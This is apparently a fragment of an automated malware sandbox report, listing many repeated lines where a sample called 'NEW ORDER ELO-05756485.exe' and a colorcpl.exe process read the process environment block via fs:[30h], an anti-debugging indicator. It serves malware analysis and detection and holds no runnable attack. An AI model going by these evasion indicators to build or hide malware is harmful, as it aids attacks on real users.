          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01396CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01314F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01314F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01328794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01397794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0134A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0131C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01348E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013D1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0133AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_0132766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01327E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013946A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013AFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013276E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013416E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013E8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_01358EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013436CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\NEW ORDER ELO-05756485.exeCode function: 2_2_013CFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04547D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04563D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04533D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045AA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04554D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04554D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04554D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045D8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04552581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04522D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04551DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04551DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04551DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045535A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04537E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045EAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04558E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045DFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0452E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04568EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045536CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045DFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045376E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045516E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0454F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04524F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04524F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045637F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04538794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04540050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04540050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045E2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045F4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045A7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0455002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0453B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_045BB8D0 mov eax, dword ptr fs:[00000030h]
